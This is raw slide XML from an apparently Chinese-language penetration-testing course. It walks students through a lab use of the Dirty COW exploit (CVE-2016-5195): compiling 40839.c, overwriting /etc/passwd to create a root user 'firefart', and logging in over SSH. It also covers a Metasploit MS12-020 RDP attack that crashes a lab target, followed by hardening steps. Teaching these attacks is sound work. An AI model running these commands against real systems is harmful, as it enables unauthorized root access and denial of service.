            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937260" y="932815"/>
            <a:ext cx="9753600" cy="2214880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948690" y="3147695"/>
            <a:ext cx="9935210" cy="2710815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>gcc -pthread 40839.c -o dirty –lcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令对40839.c文件进行编译，生成新的可执行文件dirty,如图3-3-13所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 -2147482619" descr="gcc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="948690" y="3770630"/>
            <a:ext cx="9824720" cy="2231390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3376295" y="615950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3-3-13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>编译40839.c文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>7.在/tmp目录下输入./dirty执行文件，提示“/etc/passwd successfully backed up to /tmp/passwd.bak”，即成功复盖文件，提示输入新的密码，这里用“999888”作为新密码，当命令执行到mmap：b775d000时，需等待1-2分钟，提权成功后提示“You can log in with the username‘firefart’and the password ‘999888’”,即可以使用用户名“firefart”和密码“999888”进行登录；如图3-3-14所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3009900" y="5826125"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-3-14执行./dirty文件提权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482618" descr="2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069975" y="2487930"/>
            <a:ext cx="9721850" cy="3171825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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54635"/>
            <a:ext cx="10515600" cy="5922645"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>8.切换至用户firefart，输入密码999888，验证成功登录，输入whoami &amp;&amp; id和cat/etc/passwd命令查看系统用户信息，发现firefart已经是管理员，证明提权成功。如图3-3-15所示。。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1153795" y="1617345"/>
            <a:ext cx="9768840" cy="4044315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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7960"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>9.开启一个新的终端窗口，使用SSH的方法，用“firefart”账户和密码“999888”进行登录，登录成功，如图3-3-16所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482615" descr="1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="889000" y="1660525"/>
            <a:ext cx="10329545" cy="3933825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324225" y="5908040"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-3-16 firefart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用户用SSH登陆系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3502025" cy="4351655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、根据项目实施完成CVE-2016-5195漏洞实现Linux系统本地提权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、填写以下项目训练节点的名称或参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4842828" y="599440"/>
          <a:ext cx="6031230" cy="4572000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1359535"/>
                <a:gridCol w="3013075"/>
                <a:gridCol w="1658620"/>
              </a:tblGrid>
              <a:tr h="0">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项目名称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项目节点</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节点参数</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rowSpan="3">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收集系统基本信息</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1、扫描端口信息</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2、系统内核信息</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3、查看/etc/passwd文件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rowSpan="7">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漏洞利用</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1、搜索dirty的利用模块件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2、上传40893.c文件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3、连接靶机并查看内核版本</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4、编译40839.c文件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5、执行./dirty命令</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6、切换firefart用户查看信息</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 </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2000" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>7、firefart用户用SSH连接靶机</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17195" y="-45720"/>
            <a:ext cx="11250930" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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60081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en-US" altLang="zh-CN"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a:t>
            </a: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利用CVE-2016-5195漏洞实现Linux系统本地提权</a:t>
            </a:r>
            <a:endPar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605" y="1577975"/>
          <a:ext cx="5202555" cy="4871720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="1699895"/>
                <a:gridCol w="448945"/>
                <a:gridCol w="991870"/>
                <a:gridCol w="991870"/>
              </a:tblGrid>
              <a:tr h="408940">
                <a:tc gridSpan="5">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项目名称：利用CVE-2016-5195漏洞实现Linux系统本地提权</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0957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Linux系统漏洞（CVE-2016-5195）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信息收集与漏洞利用</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20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30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865">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3728085"/>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913765">
                <a:tc gridSpan="1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项目名称：利用CVE-2016-5195漏洞实现Linux系统本地提权</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67715">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039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269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3350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rPr>
              <a:t>3.3.2 利用CVE-2016-5195漏洞实现Linux系统本地提权</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>思考可否将默认的用户名“firefart”更改为其它用户名，如“hack”,应该怎么做？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="40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32435"/>
            <a:ext cx="10515600" cy="5923915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>4.使用漏洞攻击模块“use auxiliary/dos/windows/rdp/ms12_020_maxchannelid”，用“show options”命令查看配置参数，如图3-1-4所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482621" descr="图3-1-4  使用漏洞攻击模块"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1813560"/>
            <a:ext cx="6329045" cy="3971925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994025" y="5988050"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-1-4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用漏洞攻击模块</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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>5.设置靶机IP地址set rhosts 192.168.66.10,输入run或exploit命令执行攻击；攻击后提示“Auxiliary module execution completed”， 如图3-1-5所示，说明攻击完成，此时目标靶机因受到攻击则出现蓝屏，如图3-1-6所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 -2147482620" descr="图3-1-5  执行攻击"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006475" y="2000250"/>
            <a:ext cx="5271770" cy="3545840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 125" descr="捕获"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6541135" y="1913890"/>
            <a:ext cx="5116195" cy="3632200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2138045" y="5826125"/>
            <a:ext cx="2332355" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-1-5  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>执行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143750" y="5722620"/>
            <a:ext cx="3638550" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-1-6  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>靶机受攻击后蓝屏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="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15265"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>步骤三 加固靶机漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>根据MS12_020漏洞分析，可以通过以下几种方法进行系统加固。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>1.在Windows系统中关闭远程桌面协议（Remote Desktop Protocol），不开启远程桌面协议（Remote Desktop Protocol）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>2.禁用如下服务：Terminal Services, Remote Desktop, Remote Assistance, Windows Small Business Server 2003 Remote Web Workplace feature。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>3.配置防火墙过滤向3389端口的请求。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>4.安装系统补丁。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>下面将通过第1种方法，关闭远程桌面协议服务的方法来加固和验证，步骤如下。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>1)开始→控制面板→系统→远程，将“远程协助”和“远程桌面”的勾选弃掉，如图3-1-7所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300"/>
              <a:t>2)再次采用前面的步骤五的方法进行攻击测试，出现RDP Service 服务关闭提示，说明系统加固有效，如图3-1-8所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="23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2147482618" descr="图3-1-7 关闭远程桌面功能"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="874395" y="304800"/>
            <a:ext cx="4001770" cy="4351655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 -2147482617" descr="图3-1-8 攻击失败，加固有效"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1039495"/>
            <a:ext cx="5273040" cy="3084195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016000" y="5046345"/>
            <a:ext cx="3444875" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-1-7 关闭远程桌面功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7284085" y="4678045"/>
            <a:ext cx="3100070" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图3-1-8 攻击失败，加固有效</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nSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
